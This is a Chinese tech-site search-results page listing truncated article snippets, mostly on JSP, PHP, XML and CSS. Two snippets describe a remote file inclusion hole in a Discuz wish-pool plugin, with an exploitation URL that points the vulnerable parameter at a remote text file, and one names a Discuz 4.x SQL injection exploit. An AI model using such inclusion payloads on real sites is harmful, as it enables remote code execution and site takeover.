搜索列表
-
discuz许愿池插件远程包含漏洞
【安全相关】许愿池插件的wish.php文件出的问题: require $discuz_root.'./include/discuzcode.func.php'; 手工利用方法: 远程包含漏洞,变量discuz_root过滤不严,利用方法: http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt? 不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。 这里xxxx.txt用C...
discuz许愿池插件远程包含漏洞 -
Discuz! 4.x SQL injection / admin credentials disclosure exploit
【安全相关】前段时间发过Discuz! 5.0.0 GBK版本的EXP 今天在CN.Tink那里看到的4.x的,我去原站转了过来,然后找了个Discuz! 4.1.0测试了一下,成功,看下面截图,Discuz! 5.0.0 GBK版本的那个EXP又许多朋友不知道怎么用,当时我说了下,还是有朋友不明白,这次我截了图上来,不知道怎么用...
Discuz!4.xSQLinjection/admincredentialsdisclosureexploit -
discuz许愿池插件远程包含漏洞
【安全相关】许愿池插件的wish.php文件出的问题: require $discuz_root.'./include/discuzcode.func.php'; 手工利用方法: 远程包含漏洞,变量discuz_root过滤不严,利用方法: http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt? 不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。 这里xxxx.txt用C...
discuz许愿池插件远程包含漏洞 -
部分搜索引擎登陆口
【网站运营】百度免费登录入口 http://www.baidu.com/search/url_submit.htm 新浪免费登录入口 http://bizsite.sina.com.cn/newbizsite/docc/index-2jifu-09.htm 搜狐免费登录入口http://db.sohu.com/regurl/regform.asp?Step=REGFORM&class= 天网免费登录入口 http://bingle...
部分搜索引擎登陆口 -
WIN2000+PHP+MYSQL+TOMCAT+JSP完全整合安装手册
【JSP编程】一、前期准备情况1。一个安装好的WIN2000服务器,注意:如果预装了IIS,请先将IIS服务停掉或禁用。2。下栽软件APACHE:版本:1.3.22 ——apache_1.3.22-win32-x86.msiJDK:版本: 1.3 ——j2sdk1_3_0-win.exePHP: 版本: 4.0.4 ——php4.0.4pl1-win32.zipMYSQL:...
|WI|IN|N2|20|00|00|0P|PH|HP|PM|MY|YS|SQ|QL|LT|TO|OM|MC|CA|AT|TJ|JS|SP|P完|完全|全整|整 -
JSP安全性初探
【JSP编程】综述:有几种办法可以暴露JSP代码,不过经过大量测试,这和WEB SERVER的配置有绝对的关系,就拿IBM Websphere Commerce Suite而言,还有别的方法看到JSP源代码,但相信是IBM HTTP SERVER的配置造成的。 如果想发现JSP暴露源代码的BUG的话,首先需要了解JSP的工作原理。 JSP...
|JS|SP|P安|安全|全性|性初|初探|探| -
利用iText在JSP中生成PDF报表
【JSP编程】问题的由来 前不久做了一个通过JSP生成PDF报表的小项目,算得上开了一次眼界。企业的一些信息通过网络形成Html报表,虽然IE可以直接打印显示在其中的内容,但是从界面上来看,如果直接将Html的显示结果打印出来,显得不太美观。如果将它转成PDF文件再打印,则打印效果会好很多。 iText简介 iText是一个...
|利用|用i|iT|Te|ex|xt|t在|在J|JS|SP|P中|中生|生成|成P|PD|DF|F报|报表|表| -
Java数据对象JDO 2.0查询语言的特点
【JSP编程】 查询语言的改进是JDO2.0规范中的重要环节,本文从较高的层面阐述JDO2.0所提供的一些新功能。由于JDO2.0规范还未进入公开草案状态,目前还没有任何内容敲定下来,一切都还可能面临变化。不过,JDO2.0将会很快进入最后阶段,而这里提到的查询特性是JDO2.0专家组(译者注:David Jordan就是...
|Ja|av|va|a数|数据|据对|对象|象J|JD|DO|O2|20|0查|查询|询语|语言|言的|的特|特点|点| -
JDO 2.0查询语言的特点
【JSP编程】 查询语言的改进是JDO2.0规范中的重要环节,本文从较高的层面阐述JDO2.0所提供的一些新功能。由于JDO2.0规范还未进入公开草案状态,目前还没有任何内容敲定下来,一切都还可能面临变化。不过,JDO2.0将会很快进入最后阶段,而这里提到的查询特性是JDO2.0专家组(译者注:David Jordan就是专家组重要成员)花...
|JD|DO|O2|20|0查|查询|询语|语言|言的|的特|特点|点| -
使用PHP DOM-XML创建和解析XML文件
【XML/RSS】使用PHP DOM-XML创建和解析XML文件 <?php /** * Topic: Create and parse XML files using PHP DOM-XML * Source: http://www.php.net/domxml * Refe...
|使用|用P|PH|HP|PD|DO|OM|MX|XM|ML|L创|创建|建和|和解|解析|析X|XM|ML|L文|文件|件| -
130个漂亮CSS布局站点参考
【CSS/HTML】以下是CSSVault.com推荐的2004年1月--3月130个CSS布局站点,供大家参考: CCD Design Webexpresse Happy Cog Icelandic National Team Derek Powazek Blogdsgn Postcard Times Eview 360 Euro Pair Agency Schillmania DFS Online Ways to create The Great Monkey Papel Continuo M...
|13|30|0个|个漂|漂亮|亮C|CS|SS|S布|布局|局站|站点|点参|参考|考| -
On having layout
【CSS/HTML】译者注:一篇很好的文章,很久以前在blog上就推荐过,这两天断断续续花了点时间翻译了一下,推荐读读。英文原文在此。 文中所有的 layout 这个单词都未作翻译,一来本身这个单词意思就比较多,翻成啥都觉得别扭,二来它也是专有的属性,所以就意会一下吧。水平有限,很多地方都是模模糊糊地意译,发现错误欢迎留言指出。 引用一...
|On|nh|ha|av|vi|in|ng|gl|la|ay|yo|ou|ut|t|
